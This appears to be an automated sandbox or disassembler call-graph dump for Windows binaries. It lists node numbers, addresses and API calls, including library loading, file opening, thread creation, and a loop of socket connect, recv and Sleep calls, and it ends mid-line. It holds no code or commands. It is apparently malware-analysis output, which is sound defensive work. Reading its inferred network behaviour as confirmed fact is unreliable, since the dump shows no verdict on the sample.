60087->60089 60092 7ff8b9188c98 60089->60092 60092->59953 60092->59954 60094 7ff8b9188971 60093->60094 60095 7ff8b918898c 60093->60095 60096 7ff8b9188976 60094->60096 60097 7ff8b91889bf 60094->60097 60098 7ff8b9181292 6 API calls 60095->60098 60100 7ff8b91889f2 60096->60100 60107 7ff8b918897b 60096->60107 60099 7ff8b9181292 6 API calls 60097->60099 60103 7ff8b91889b5 60098->60103 60099->60103 60101 7ff8b9181292 6 API calls 60100->60101 60101->60103 60102 7ff8b9188a5c 60102->60103 60105 7ff8b9188a63 60102->60105 60106 7ff8b9181292 6 API calls 60103->60106 60104 7ff8b9188a31 strcmp 60104->60107 60109 7ff8b9188a79 60106->60109 60107->60102 60107->60104 60109->60092 60128 7ff8b9181adb 60127->60128 60129 7ff8b9181ab2 LoadLibraryA 60127->60129 60130 7ff8b9181ade GetLastError 60128->60130 60129->60130 60131 7ff8b9181ac0 60129->60131 60132 7ff8b9181292 6 API calls 60130->60132 60133 7ff8b9181292 6 API calls 60131->60133 60134 7ff8b9181ad9 60132->60134 60133->60134 60171 7ff8ba4f1590 GetLastError 60170->60171 60172 7ff8ba4f146a 60170->60172 60174 7ff8ba4f1292 6 API calls 60171->60174 60173 7ff8ba4f9cc0 8 API calls 60172->60173 60175 7ff8ba4f1486 60173->60175 60179 7ff8ba4f1569 60174->60179 60176 7ff8ba4f6dd1 8 API calls 60175->60176 60177 7ff8ba4f149a 60176->60177 60178 7ff8ba4f14a4 strlen 60177->60178 60177->60179 60181 7ff8ba4f14d3 60178->60181 60182 7ff8ba4f14bd 60178->60182 60180 7ff8ba4f1292 6 API calls 60179->60180 60183 7ff8ba4f1586 60180->60183 60185 7ff8ba4f14f8 strlen fopen 60181->60185 60186 7ff8ba4f14d8 strcat strlen 60181->60186 60182->60181 60184 7ff8ba4f14c2 strlen 60182->60184 60183->59853 60194 7ff8ba4f7ab4 60183->60194 60184->60181 60187 7ff8ba4f1547 60185->60187 60188 7ff8ba4f165d 60185->60188 60186->60185 60189 7ff8ba4f1292 6 API calls 60187->60189 60190 7ff8ba4f1292 6 API calls 60188->60190 60191 7ff8ba4f1561 60189->60191 60190->60179 60191->60179 60192 7ff8ba4f16cd 60191->60192 60193 7ff8ba4f1292 6 API calls 60192->60193 60193->60183 60195 7ff8ba4f7ad6 60194->60195 60196 7ff8ba4f7b19 60194->60196 60275 7ff8ba4f7720 60195->60275 60198 7ff8ba4f1292 6 API calls 60196->60198 60200 7ff8ba4f7aef 60198->60200 60200->59862 60204 7ff8ba4f3420 60200->60204 60201 7ff8ba4f7b49 _errno _strtoui64 _errno 60201->60200 60202 7ff8ba4f7b7c _errno 60201->60202 60203 7ff8ba4f1292 6 API calls 60202->60203 60203->60200 60317 7ff8ba4f9ff4 60204->60317 60240 7ff8ba4f2e22 60239->60240 60241 7ff8ba4f2dfa 60239->60241 60243 7ff8ba4f1292 6 API calls 60240->60243 60242 7ff8ba4f1292 6 API calls 60241->60242 60244 7ff8ba4f2e14 60242->60244 60245 7ff8ba4f2e3b 60243->60245 60244->59862 60247 7ff8ba4f1d21 InitializeCriticalSectionAndSpinCount 60244->60247 60246 7ff8ba4f1292 6 API calls 60245->60246 60246->60244 60248 7ff8ba4f1d46 CreateThread 60247->60248 60249 7ff8ba4f1dc4 GetLastError 60247->60249 60250 7ff8ba4f1e9c GetLastError 60248->60250 60257 7ff8ba4f1d92 60248->60257 60251 7ff8ba4f1292 6 API calls 60249->60251 60253 7ff8ba4f1292 6 API calls 60250->60253 60258 7ff8ba4f1d9f 60251->60258 60252 7ff8ba4f1f95 60254 7ff8ba4f1292 6 API calls 60252->60254 60253->60257 60255 7ff8ba4f1dbc 60254->60255 60255->59862 60256 7ff8ba4f1292 6 API calls 60256->60255 60257->60252 60257->60258 60258->60255 60258->60256 60276 7ff8ba4f7731 60275->60276 60277 7ff8ba4f7769 60275->60277 60283 7ff8ba4f7409 60276->60283 60279 7ff8ba4f1292 6 API calls 60277->60279 60281 7ff8ba4f7748 60279->60281 60281->60200 60281->60201 60284 7ff8ba4f7421 60283->60284 60285 7ff8ba4f743c 60283->60285 60286 7ff8ba4f7426 60284->60286 60287 7ff8ba4f746f 60284->60287 60288 7ff8ba4f1292 6 API calls 60285->60288 60289 7ff8ba4f74a2 60286->60289 60296 7ff8ba4f742b 60286->60296 60290 7ff8ba4f1292 6 API calls 60287->60290 60294 7ff8ba4f7465 60288->60294 60291 7ff8ba4f1292 6 API calls 60289->60291 60290->60294 60291->60294 60292 7ff8ba4f750c 60293 7ff8ba4f7513 60292->60293 60292->60294 60298 7ff8ba4f1292 6 API calls 60294->60298 60295 7ff8ba4f74e1 strcmp 60295->60296 60296->60292 60296->60295 60299 7ff8ba4f7529 60298->60299 60299->60281 60318 7ff8ba4fa002 LoadLibraryA 60317->60318 60319 7ff8ba4fa02b 60317->60319 60320 7ff8ba4fa010 60318->60320 60321 7ff8ba4fa02e GetLastError 60318->60321 60319->60321 60322 7ff8ba4f1292 6 API calls 60320->60322 60323 7ff8ba4f1292 6 API calls 60321->60323 60324 7ff8ba4f3434 60322->60324 60323->60324 60361 7ff8bfb8146a 60360->60361 60362 7ff8bfb81590 GetLastError 60360->60362 60487 7ff8bfb84170 GetModuleHandleExA 60361->60487 60364 7ff8bfb81292 19 API calls 60362->60364 60374 7ff8bfb81569 60364->60374 60368 7ff8bfb814a4 strlen 60370 7ff8bfb814bd 60368->60370 60371 7ff8bfb814d3 60368->60371 60369 7ff8bfb81292 19 API calls 60372 7ff8bfb81586 60369->60372 60370->60371 60373 7ff8bfb814c2 strlen 60370->60373 60375 7ff8bfb814f8 strlen fopen 60371->60375 60376 7ff8bfb814d8 strcat strlen 60371->60376 60372->59866 60384 7ff8bfb8ca74 60372->60384 60373->60371 60374->60369 60377 7ff8bfb8165d 60375->60377 60378 7ff8bfb81547 60375->60378 60376->60375 60379 7ff8bfb81292 19 API calls 60377->60379 60380 7ff8bfb81292 19 API calls 60378->60380 60379->60374 60381 7ff8bfb81561 60380->60381 60381->60374 60382 7ff8bfb816cd 60381->60382 60383 7ff8bfb81292 19 API calls 60382->60383 60383->60372 60385 7ff8bfb8ca96 60384->60385 60386 7ff8bfb8cad9 60384->60386 60505 7ff8bfb8c6e0 60385->60505 60388 7ff8bfb81292 19 API calls 60386->60388 60390 7ff8bfb84587 60388->60390 60390->59867 60394 7ff8bfb84bc0 60390->60394 60391 7ff8bfb8cb09 _errno _strtoui64 _errno 60391->60390 60392 7ff8bfb8cb3c _errno 60391->60392 60393 7ff8bfb81292 19 API calls 60392->60393 60393->60390 60547 7ff8bfb844a4 60394->60547 60428 7ff8bfb824ca 60427->60428 60429 7ff8bfb824f2 60427->60429 60430 7ff8bfb81292 19 API calls 60428->60430 60431 7ff8bfb81292 19 API calls 60429->60431 60434 7ff8bfb824e4 60430->60434 60432 7ff8bfb8250b 60431->60432 60433 7ff8bfb81292 19 API calls 60432->60433 60433->60434 60434->59874 60436 7ff8bfb8a084 GetLastError 60435->60436 60437 7ff8bfb8a006 CreateThread 60435->60437 60440 7ff8bfb81292 19 API calls 60436->60440 60438 7ff8bfb8a052 60437->60438 60439 7ff8bfb8a15c GetLastError 60437->60439 60441 7ff8bfb8a255 60438->60441 60442 7ff8bfb8a05f 60438->60442 60443 7ff8bfb81292 19 API calls 60439->60443 60440->60442 60443->60442 60488 7ff8bfb81486 60487->60488 60489 7ff8bfb841a2 GetLastError 60487->60489 60491 7ff8bfb88571 60488->60491 60490 7ff8bfb81292 19 API calls 60489->60490 60490->60488 60492 7ff8bfb88582 60491->60492 60493 7ff8bfb885b8 60491->60493 60495 7ff8bfb88587 60492->60495 60496 7ff8bfb885e8 60492->60496 60494 7ff8bfb81292 19 API calls 60493->60494 60502 7ff8bfb8149a 60494->60502 60498 7ff8bfb88590 60495->60498 60499 7ff8bfb88618 60495->60499 60497 7ff8bfb81292 19 API calls 60496->60497 60497->60502 60504 7ff8bfb88432 21 API calls 60498->60504 60501 7ff8bfb81292 19 API calls 60499->60501 60501->60502 60502->60368 60502->60374 60503 7ff8bfb88595 60503->60502 60504->60503 60506 7ff8bfb8c6f1 60505->60506 60507 7ff8bfb8c729 60505->60507 60513 7ff8bfb8c3c9 60506->60513 60509 7ff8bfb81292 19 API calls 60507->60509 60511 7ff8bfb8c708 60509->60511 60511->60390 60511->60391 60514 7ff8bfb8c3e1 60513->60514 60515 7ff8bfb8c3fc 60513->60515 60516 7ff8bfb8c3e6 60514->60516 60517 7ff8bfb8c42f 60514->60517 60518 7ff8bfb81292 19 API calls 60515->60518 60519 7ff8bfb8c462 60516->60519 60521 7ff8bfb8c3eb 60516->60521 60520 7ff8bfb81292 19 API calls 60517->60520 60526 7ff8bfb8c425 60518->60526 60522 7ff8bfb81292 19 API calls 60519->60522 60520->60526 60523 7ff8bfb8c4cc 60521->60523 60524 7ff8bfb8c4a1 strcmp 60521->60524 60522->60526 60525 7ff8bfb8c4d3 60523->60525 60523->60526 60524->60521 60528 7ff8bfb81292 19 API calls 60526->60528 60529 7ff8bfb8c4e9 60528->60529 60529->60511 60548 7ff8bfb844db 60547->60548 60549 7ff8bfb844b2 LoadLibraryA 60547->60549 60550 7ff8bfb844de GetLastError 60548->60550 60549->60550 60551 7ff8bfb844c0 60549->60551 60553 7ff8bfb81292 19 API calls 60550->60553 60552 7ff8bfb81292 19 API calls 60551->60552 60554 7ff8bfb844d9 60552->60554 60553->60554 60693 7ff8bfb3a3da 60692->60693 60694 7ff8bfb3a500 GetLastError 60692->60694 60800 7ff8bfb37140 GetModuleHandleExA 60693->60800 60695 7ff8bfb3a202 6 API calls 60694->60695 60701 7ff8bfb3a4d9 60695->60701 60700 7ff8bfb3a414 strlen 60703 7ff8bfb3a42d 60700->60703 60704 7ff8bfb3a443 60700->60704 60702 7ff8bfb3a202 6 API calls 60701->60702 60707 7ff8bfb3a4f6 60702->60707 60703->60704 60708 7ff8bfb3a432 strlen 60703->60708 60705 7ff8bfb3a468 strlen fopen 60704->60705 60706 7ff8bfb3a448 strcat strlen 60704->60706 60709 7ff8bfb3a5cd 60705->60709 60710 7ff8bfb3a4b7 60705->60710 60706->60705 60707->59884 60716 7ff8bfb394f4 60707->60716 60708->60704 60712 7ff8bfb3a202 6 API calls 60709->60712 60711 7ff8bfb3a202 6 API calls 60710->60711 60713 7ff8bfb3a4d1 60711->60713 60712->60701 60713->60701 60714 7ff8bfb3a63d 60713->60714 60715 7ff8bfb3a202 6 API calls 60714->60715 60715->60707 60717 7ff8bfb39559 60716->60717 60718 7ff8bfb39516 60716->60718 60720 7ff8bfb3a202 6 API calls 60717->60720 60818 7ff8bfb39160 60718->60818 60722 7ff8bfb3952f 60720->60722 60722->59885 60726 7ff8bfb32610 60722->60726 60723 7ff8bfb39589 _errno _strtoui64 _errno 60723->60722 60724 7ff8bfb395bc _errno 60723->60724 60725 7ff8bfb3a202 6 API calls 60724->60725 60725->60722 60860 7ff8bfb37474 60726->60860 60762 7ff8bfb31fea 60761->60762 60763 7ff8bfb32012 60761->60763 60764 7ff8bfb3a202 6 API calls 60762->60764 60765 7ff8bfb3a202 6 API calls 60763->60765 60766 7ff8bfb32004 60764->60766 60767 7ff8bfb3202b 60765->60767 60766->59890 60768 7ff8bfb3a202 6 API calls 60767->60768 60768->60766 60770 7ff8bfb3696a InitializeCriticalSectionAndSpinCount 60769->60770 60771 7ff8bfb36aec GetLastError 60769->60771 60772 7ff8bfb36c08 GetLastError 60770->60772 60773 7ff8bfb36997 60770->60773 60774 7ff8bfb3a202 6 API calls 60771->60774 60775 7ff8bfb3a202 6 API calls 60772->60775 60776 7ff8bfb369ad CreateThread 60773->60776 60777 7ff8bfb36c26 60773->60777 60786 7ff8bfb36b0a 60774->60786 60775->60777 60786->60772 60801 7ff8bfb37168 60800->60801 60802 7ff8bfb37172 GetLastError 60800->60802 60804 7ff8bfb35fb1 60801->60804 60803 7ff8bfb3a202 6 API calls 60802->60803 60803->60801 60805 7ff8bfb35ff8 60804->60805 60806 7ff8bfb35fc2 60804->60806 60807 7ff8bfb3a202 6 API calls 60805->60807 60808 7ff8bfb36028 60806->60808 60809 7ff8bfb35fc7 60806->60809 60815 7ff8bfb35fdd 60807->60815 60810 7ff8bfb3a202 6 API calls 60808->60810 60811 7ff8bfb36058 60809->60811 60812 7ff8bfb35fd0 60809->60812 60810->60815 60814 7ff8bfb3a202 6 API calls 60811->60814 60817 7ff8bfb35e72 8 API calls 60812->60817 60814->60815 60815->60700 60815->60701 60816 7ff8bfb35fd5 60816->60815 60817->60816 60819 7ff8bfb391a9 60818->60819 60820 7ff8bfb39171 60818->60820 60822 7ff8bfb3a202 6 API calls 60819->60822 60826 7ff8bfb38e49 60820->60826 60825 7ff8bfb39188 60822->60825 60825->60722 60825->60723 60827 7ff8bfb38e7c 60826->60827 60828 7ff8bfb38e61 60826->60828 60831 7ff8bfb3a202 6 API calls 60827->60831 60829 7ff8bfb38eaf 60828->60829 60830 7ff8bfb38e66 60828->60830 60833 7ff8bfb3a202 6 API calls 60829->60833 60832 7ff8bfb38ee2 60830->60832 60839 7ff8bfb38e6b 60830->60839 60838 7ff8bfb38ea5 60831->60838 60834 7ff8bfb3a202 6 API calls 60832->60834 60833->60838 60834->60838 60835 7ff8bfb38f4c 60837 7ff8bfb38f53 60835->60837 60835->60838 60836 7ff8bfb38f21 strcmp 60836->60839 60841 7ff8bfb3a202 6 API calls 60838->60841 60839->60835 60839->60836 60842 7ff8bfb38f69 60841->60842 60842->60825 60861 7ff8bfb374ab 60860->60861 60862 7ff8bfb37482 LoadLibraryA 60860->60862 60863 7ff8bfb374ae GetLastError 60861->60863 60862->60863 60864 7ff8bfb37490 60862->60864 60866 7ff8bfb3a202 6 API calls 60863->60866 60865 7ff8bfb3a202 6 API calls 60864->60865 60867 7ff8bfb32624 60865->60867 60866->60867 60904 7ff8b915146a 60903->60904 60905 7ff8b9151590 GetLastError 60903->60905 61016 7ff8b915cc60 GetModuleHandleExA 60904->61016 60907 7ff8b9151292 6 API calls 60905->60907 60908 7ff8b9151569 60907->60908 60915 7ff8b9151292 6 API calls 60908->60915 60912 7ff8b91514a4 strlen 60913 7ff8b91514bd 60912->60913 60914 7ff8b91514d3 60912->60914 60913->60914 60916 7ff8b91514c2 strlen 60913->60916 60917 7ff8b91514f8 strlen fopen 60914->60917 60918 7ff8b91514d8 strcat strlen 60914->60918 60919 7ff8b9151586 60915->60919 60916->60914 60920 7ff8b915165d 60917->60920 60921 7ff8b9151547 60917->60921 60918->60917 60919->59895 60927 7ff8b915c974 60919->60927 60922 7ff8b9151292 6 API calls 60920->60922 60923 7ff8b9151292 6 API calls 60921->60923 60922->60908 60924 7ff8b9151561 60923->60924 60924->60908 60925 7ff8b91516cd 60924->60925 60928 7ff8b915c9d9 60927->60928 60929 7ff8b915c996 60927->60929 60931 7ff8b9151292 6 API calls 60928->60931 61034 7ff8b915c5e0 60929->61034 60936 7ff8b915be11 60931->60936 60933 7ff8b915ca09 _errno _strtoui64 _errno 60934 7ff8b915ca3c _errno 60933->60934 60933->60936 60935 7ff8b9151292 6 API calls 60934->60935 60935->60936 60936->59896 60937 7ff8b9159770 60936->60937 61076 7ff8b915cf94 60937->61076 60973 7ff8b9152dfa 60972->60973 60974 7ff8b9152e22 60972->60974 60975 7ff8b9151292 6 API calls 60973->60975 60976 7ff8b9151292 6 API calls 60974->60976 60977 7ff8b9152e14 60975->60977 60978 7ff8b9152e3b 60976->60978 60977->59896 60980 7ff8b9155a84 InitializeCriticalSectionAndSpinCount 60977->60980 60979 7ff8b9151292 6 API calls 60978->60979 60979->60977 60981 7ff8b9155a9f 60980->60981 60982 7ff8b9155ad4 GetLastError 60980->60982 60984 7ff8b9151292 6 API calls 60981->60984 60983 7ff8b9151292 6 API calls 60982->60983 60986 7ff8b9155af2 60983->60986 60985 7ff8b9155ac7 60984->60985 60985->59896 60988 7ff8b9151d21 InitializeCriticalSectionAndSpinCount 60985->60988 60987 7ff8b9151292 6 API calls 60986->60987 60987->60985 61017 7ff8b915cc92 GetLastError 61016->61017 61019 7ff8b9151486 61016->61019 61018 7ff8b9151292 6 API calls 61017->61018 61018->61019 61020 7ff8b9158ff1 61019->61020 61021 7ff8b9159038 61020->61021 61022 7ff8b9159002 61020->61022 61023 7ff8b9151292 6 API calls 61021->61023 61024 7ff8b9159068 61022->61024 61025 7ff8b9159007 61022->61025 61031 7ff8b915149a 61023->61031 61026 7ff8b9151292 6 API calls 61024->61026 61027 7ff8b9159098 61025->61027 61028 7ff8b9159010 61025->61028 61026->61031 61029 7ff8b9151292 6 API calls 61027->61029 61033 7ff8b9158eb2 8 API calls 61028->61033 61029->61031 61031->60908 61031->60912 61032 7ff8b9159015 61032->61031 61033->61032 61035 7ff8b915c629 61034->61035 61036 7ff8b915c5f1 61034->61036 61038 7ff8b9151292 6 API calls 61035->61038 61042 7ff8b915c2c9 61036->61042 61040 7ff8b915c608 61038->61040 61040->60933 61040->60936 61043 7ff8b915c2fc 61042->61043 61044 7ff8b915c2e1 61042->61044 61047 7ff8b9151292 6 API calls 61043->61047 61045 7ff8b915c32f 61044->61045 61046 7ff8b915c2e6 61044->61046 61048 7ff8b9151292 6 API calls 61045->61048 61049 7ff8b915c362 61046->61049 61053 7ff8b915c2eb 61046->61053 61051 7ff8b915c325 61047->61051 61048->61051 61050 7ff8b9151292 6 API calls 61049->61050 61050->61051 61056 7ff8b9151292 6 API calls 61051->61056 61052 7ff8b915c3cc 61052->61051 61053->61052 61054 7ff8b915c3a1 strcmp 61053->61054 61054->61053 61058 7ff8b915c3e9 61056->61058 61058->61040 61077 7ff8b915cfcb 61076->61077 61078 7ff8b915cfa2 LoadLibraryA 61076->61078 61079 7ff8b915cfce GetLastError 61077->61079 61078->61079 61080 7ff8b915cfb0 61078->61080 61082 7ff8b9151292 6 API calls 61079->61082 61081 7ff8b9151292 6 API calls 61080->61081 61083 7ff8b9159784 61081->61083 61082->61083 61120 7ff8bfb531aa 61119->61120 61121 7ff8bfb532d0 GetLastError 61119->61121 61224 7ff8bfb51e40 GetModuleHandleExA 61120->61224 61123 7ff8bfb52fd2 6 API calls 61121->61123 61131 7ff8bfb532a9 61123->61131 61127 7ff8bfb531e4 strlen 61129 7ff8bfb531fd 61127->61129 61130 7ff8bfb53213 61127->61130 61128 7ff8bfb52fd2 6 API calls 61132 7ff8bfb532c6 61128->61132 61129->61130 61133 7ff8bfb53202 strlen 61129->61133 61134 7ff8bfb53238 strlen fopen 61130->61134 61135 7ff8bfb53218 strcat strlen 61130->61135 61131->61128 61132->59909 61143 7ff8bfb58ab4 61132->61143 61133->61130 61136 7ff8bfb5339d 61134->61136 61137 7ff8bfb53287 61134->61137 61135->61134 61138 7ff8bfb52fd2 6 API calls 61136->61138 61241 7ff8bfb52fd2 61137->61241 61138->61131 61144 7ff8bfb58b19 61143->61144 61145 7ff8bfb58ad6 61143->61145 61146 7ff8bfb52fd2 6 API calls 61144->61146 61261 7ff8bfb58720 61145->61261 61152 7ff8bfb53501 61146->61152 61149 7ff8bfb58b49 _errno _strtoui64 _errno 61150 7ff8bfb58b7c _errno 61149->61150 61149->61152 61151 7ff8bfb52fd2 6 API calls 61150->61151 61151->61152 61152->59911 61153 7ff8bfb54430 61152->61153 61303 7ff8bfb52174 61153->61303 61189 7ff8bfb52f3a 61188->61189 61190 7ff8bfb52f62 61188->61190 61192 7ff8bfb52fd2 6 API calls 61189->61192 61191 7ff8bfb52fd2 6 API calls 61190->61191 61193 7ff8bfb52f7b 61191->61193 61195 7ff8bfb52f54 61192->61195 61194 7ff8bfb52fd2 6 API calls 61193->61194 61194->61195 61195->59916 61197 7ff8bfb53bc4 GetLastError 61196->61197 61198 7ff8bfb53b46 CreateThread 61196->61198 61200 7ff8bfb52fd2 6 API calls 61197->61200 61199 7ff8bfb53c9c GetLastError 61198->61199 61207 7ff8bfb53b92 61198->61207 61201 7ff8bfb52fd2 6 API calls 61199->61201 61203 7ff8bfb53b9f 61200->61203 61201->61207 61202 7ff8bfb53d95 61207->61202 61207->61203 61225 7ff8bfb51e68 61224->61225 61226 7ff8bfb51e72 GetLastError 61224->61226 61228 7ff8bfb57dd1 61225->61228 61227 7ff8bfb52fd2 6 API calls 61226->61227 61227->61225 61229 7ff8bfb57e18 61228->61229 61230 7ff8bfb57de2 61228->61230 61231 7ff8bfb52fd2 6 API calls 61229->61231 61232 7ff8bfb57e48 61230->61232 61233 7ff8bfb57de7 61230->61233 61239 7ff8bfb531da 61231->61239 61234 7ff8bfb52fd2 6 API calls 61232->61234 61235 7ff8bfb57e78 61233->61235 61236 7ff8bfb57df0 61233->61236 61234->61239 61237 7ff8bfb52fd2 6 API calls 61235->61237 61252 7ff8bfb57c92 8 API calls 61236->61252 61237->61239 61239->61127 61239->61131 61240 7ff8bfb57df5 61240->61239 61242 7ff8bfb52fe0 61241->61242 61253 7ff8bfb5d190 61242->61253 61252->61240 61254 7ff8bfb5d19e 61253->61254 61255 7ff8bfb5d1b5 61253->61255 61262 7ff8bfb58769 61261->61262 61263 7ff8bfb58731 61261->61263 61264 7ff8bfb52fd2 6 API calls 61262->61264 61269 7ff8bfb58409 61263->61269 61267 7ff8bfb58748 61264->61267 61267->61149 61267->61152 61270 7ff8bfb5843c 61269->61270 61271 7ff8bfb58421 61269->61271 61274 7ff8bfb52fd2 6 API calls 61270->61274 61272 7ff8bfb5846f 61271->61272 61273 7ff8bfb58426 61271->61273 61277 7ff8bfb52fd2 6 API calls 61272->61277 61275 7ff8bfb5842b 61273->61275 61276 7ff8bfb584a2 61273->61276 61280 7ff8bfb58465 61274->61280 61279 7ff8bfb5850c 61275->61279 61281 7ff8bfb584e1 strcmp 61275->61281 61278 7ff8bfb52fd2 6 API calls 61276->61278 61277->61280 61278->61280 61279->61280 61282 7ff8bfb58513 61279->61282 61283 7ff8bfb52fd2 6 API calls 61280->61283 61281->61275 61285 7ff8bfb58529 61283->61285 61285->61267 61304 7ff8bfb521ab 61303->61304 61305 7ff8bfb52182 LoadLibraryA 61303->61305 61306 7ff8bfb521ae GetLastError 61304->61306 61305->61306 61307 7ff8bfb52190 61305->61307 61308 7ff8bfb52fd2 6 API calls 61306->61308 61309 7ff8bfb52fd2 6 API calls 61307->61309 61347 7ff6be03ab1e 61346->61347 61348 7ff6be03ab35 61346->61348 61352 7ff6be03bb4b fputc 61347->61352 61353 7ff6be03bb4b fputc 61348->61353 61351 7ff6be039a49 61351->59395 61351->59396 61351->59397 61352->61351 61353->61351 61354 7ff8b915184a 61360 7ff8b9151855 61354->61360 61355 7ff8b915195e 61356 7ff8b915196b 61355->61356 61421 7ff8b91522d5 10 API calls 61355->61421 61358 7ff8b915187d Sleep 61358->61360 61360->61355 61360->61358 61362 7ff8b9151932 Sleep 61360->61362 61363 7ff8b91522d5 10 API calls 61360->61363 61365 7ff8b915191e memcpy 61360->61365 61366 7ff8b915256c socket 61360->61366 61401 7ff8b9152a1a 61360->61401 61412 7ff8b9151780 61360->61412 61362->61360 61363->61360 61365->61360 61367 7ff8b915276b WSAGetLastError 61366->61367 61368 7ff8b91525a3 61366->61368 61371 7ff8b9151292 6 API calls 61367->61371 61369 7ff8b91525c5 61368->61369 61370 7ff8b91525a7 61368->61370 61374 7ff8b9152209 8 API calls 61369->61374 61422 7ff8b9152209 61370->61422 61373 7ff8b915278f 61371->61373 61376 7ff8b9152799 61373->61376 61377 7ff8b91525df 61373->61377 61378 7ff8b91525c3 61374->61378 61380 7ff8b9151292 6 API calls 61376->61380 61382 7ff8b9151292 6 API calls 61377->61382 61381 7ff8b91525d7 61378->61381 61435 7ff8b915233a setsockopt 61378->61435 61379 7ff8b915261e 61379->61381 61384 7ff8b9152623 htonl htons connect 61379->61384 61386 7ff8b9152600 61380->61386 61439 7ff8b91522d5 10 API calls 61381->61439 61382->61386 61388 7ff8b915267c WSAGetLastError 61384->61388 61389 7ff8b9152661 61384->61389 61386->61360 61391 7ff8b915268d 61388->61391 61392 7ff8b915273e WSAGetLastError 61388->61392 61390 7ff8b9152209 8 API calls 61389->61390 61394 7ff8b915266e 61390->61394 61391->61381 61395 7ff8b9152695 select 61391->61395 61393 7ff8b9151292 6 API calls 61392->61393 61393->61381 61394->61373 61394->61381 61396 7ff8b91526f6 61395->61396 61397 7ff8b9152720 61395->61397 61396->61389 61399 7ff8b91526fc WSAGetLastError 61396->61399 61398 7ff8b9151292 6 API calls 61397->61398 61398->61381 61400 7ff8b9151292 6 API calls 61399->61400 61400->61381 61402 7ff8b9152aa8 61401->61402 61403 7ff8b9152a34 61401->61403 61405 7ff8b9151292 6 API calls 61402->61405 61403->61402 61404 7ff8b9152a39 recv 61403->61404 61406 7ff8b9152a5c WSAGetLastError 61404->61406 61407 7ff8b9152a4f 61404->61407 61408 7ff8b9152a53 61405->61408 61406->61408 61409 7ff8b9152a70 61406->61409 61407->61408 61411 7ff8b9151292 6 API calls 61407->61411 61408->61360 61410 7ff8b9151292 6 API calls 61409->61410 61410->61408 61411->61408 61413 7ff8b9151798 61412->61413 61414 7ff8b9151842 61412->61414 61413->61414 61440 7ff8b915a000 61413->61440 61414->61360 61417 7ff8b9151834 LeaveCriticalSection 61417->61414 61418 7ff8b91517c8 61418->61417 61419 7ff8b9151292 6 API calls 61418->61419 61443 7ff8b915e342 61418->61443 61419->61418 61421->61356 61423 7ff8b9152219 ioctlsocket 61422->61423 61425 7ff8b915223c 61423->61425 61426 7ff8b915224d WSAGetLastError 61423->61426 61425->61379 61428 7ff8b9152154 setsockopt 61425->61428 61427 7ff8b9151292 6 API calls 61426->61427 61427->61425 61429 7ff8b9152189 setsockopt 61428->61429 61430 7ff8b91521e4 WSAGetLastError 61428->61430 61431 7ff8b91521bf WSAGetLastError 61429->61431 61432 7ff8b91521b5 61429->61432 61433 7ff8b9151292 6 API calls 61430->61433 61434 7ff8b9151292 6 API calls 61431->61434 61432->61378 61433->61432 61434->61432 61436 7ff8b9152381 WSAGetLastError 61435->61436 61438 7ff8b9152377 61435->61438 61437 7ff8b9151292 6 API calls 61436->61437 61437->61438 61438->61379 61439->61377 61441 7ff8b91517ab EnterCriticalSection 61440->61441 61442 7ff8b915a016 GetSystemTimeAsFileTime 61440->61442 61441->61418 61442->61441 61444 7ff8b915e3bc 61443->61444 61445 7ff8b915e372 61443->61445 61444->61418 61446 7ff8b915e4c7 61445->61446 61447 7ff8b915e380 61445->61447 61495 7ff8b915dc30 70 API calls 61446->61495 61448 7ff8b915e434 61447->61448 61449 7ff8b915e386 61447->61449 61451 7ff8b915e47c 61448->61451 61452 7ff8b915e43b 61448->61452 61453 7ff8b915e4d5 61449->61453 61454 7ff8b915e391 61449->61454 61456 7ff8b915e4c0 61451->61456 61457 7ff8b915e483 61451->61457 61452->61444 61492 7ff8b915d86e 57 API calls 61452->61492 61497 7ff8b915e09c 56 API calls 61453->61497 61459 7ff8b915e3e6 61454->61459 61460 7ff8b915e393 61454->61460 61455 7ff8b915e40a 61455->61444 61494 7ff8b915d95d 52 API calls 61456->61494 61457->61444 61485 7ff8b915d2bb 61457->61485 61462 7ff8b915e4ce 61459->61462 61463 7ff8b915e3f1 61459->61463 61464 7ff8b915e3cb 61460->61464 61465 7ff8b915e39a 61460->61465 61496 7ff8b915de68 53 API calls 61462->61496 61468 7ff8b915e419 61463->61468 61469 7ff8b915e3f3 61463->61469 61464->61444 61489 7ff8b915e22c 16 API calls 61464->61489 61471 7ff8b915e3a5 61465->61471 61472 7ff8b915e4e3 61465->61472 61468->61444 61491 7ff8b915df82 53 API calls 61468->61491 61477 7ff8b915e4dc 61469->61477 61478 7ff8b915e3fe 61469->61478 61473 7ff8b915e491 61471->61473 61474 7ff8b915e3b0 61471->61474 61499 7ff8b915e2bc 16 API calls 61472->61499 61493 7ff8b915d2c9 18 API calls 61473->61493 61474->61444 61488 7ff8b915d342 14 API calls 61474->61488 61498 7ff8b915e143 49 API calls 61477->61498 61478->61444 61482 7ff8b915e405 61478->61482 61490 7ff8b915da46 57 API calls 61482->61490 61500 7ff8b915d110 61485->61500 61488->61444 61489->61444 61490->61455 61491->61444 61492->61444 61493->61444 61494->61444 61495->61455 61496->61444 61497->61444 61498->61444 61499->61444 61527 7ff8b91591fb 61500->61527 61505 7ff8b915d167 61508 7ff8b915a000 GetSystemTimeAsFileTime 61505->61508 61506 7ff8b915d160 61533 7ff8b9155a68 17 API calls 61506->61533 61509 7ff8b915d17a 61508->61509 61510 7ff8b915d298 61509->61510 61513 7ff8b915d1a6 strlen 61509->61513 61535 7ff8b9155a68 17 API calls 61510->61535 61512 7ff8b915d29d 61515 7ff8b91591fb 2 API calls 61512->61515 61517 7ff8b915d13a 61512->61517 61514 7ff8b9151292 6 API calls 61513->61514 61516 7ff8b915d1de GetProcessHeap HeapAlloc 61514->61516 61515->61517 61518 7ff8b915d27d 61516->61518 61519 7ff8b915d200 61516->61519 61517->61444 61521 7ff8b9151292 6 API calls 61518->61521 61520 7ff8b915a000 GetSystemTimeAsFileTime 61519->61520 61522 7ff8b915d22f strcpy 61520->61522 61523 7ff8b915d293 61521->61523 61534 7ff8b9151992 13 API calls 61522->61534 61523->61510 61525 7ff8b915d258 61525->61509 61526 7ff8b915d261 GetProcessHeap HeapFree 61525->61526 61526->61509 61528 7ff8b9159206 61527->61528 61529 7ff8b9159211 QueryPerformanceFrequency QueryPerformanceCounter 61527->61529 61528->61517 61530 7ff8b9155a47 EnterCriticalSection 61528->61530 61529->61528 61536 7ff8b9154049 61530->61536 61533->61517 61534->61525 61535->61512 61537 7ff8b9154065 61536->61537 61540 7ff8b9154055 61536->61540 61542 7ff8b9152fbf 61537->61542 61539 7ff8b915405f 61539->61505 61539->61506 61540->61539 61563 7ff8b915387f 61540->61563 61584 